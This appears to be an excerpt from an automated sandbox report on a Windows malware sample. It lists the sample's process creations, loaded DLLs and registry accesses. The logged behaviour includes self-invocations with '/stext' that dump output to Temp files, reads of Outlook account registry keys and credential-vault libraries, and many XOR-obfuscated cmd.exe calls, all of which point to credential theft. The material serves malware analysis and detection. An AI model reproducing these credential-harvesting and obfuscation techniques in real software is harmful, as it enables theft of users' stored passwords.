              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: rstrtmgr.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: pstorec.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: vaultcli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: pstorec.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\Desktop\asXlZG3aW6.cfg
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: asXlZG3aW6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Unpacked PE file: 131.2.asXlZG3aW6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Unpacked PE file: 132.2.asXlZG3aW6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Unpacked PE file: 133.2.asXlZG3aW6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara match | File source: 00000000.00000002.21761784338.0000000004742000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.21759600322.00000000004A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: asXlZG3aW6.exe PID: 3616, type: MEMORYSTR
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
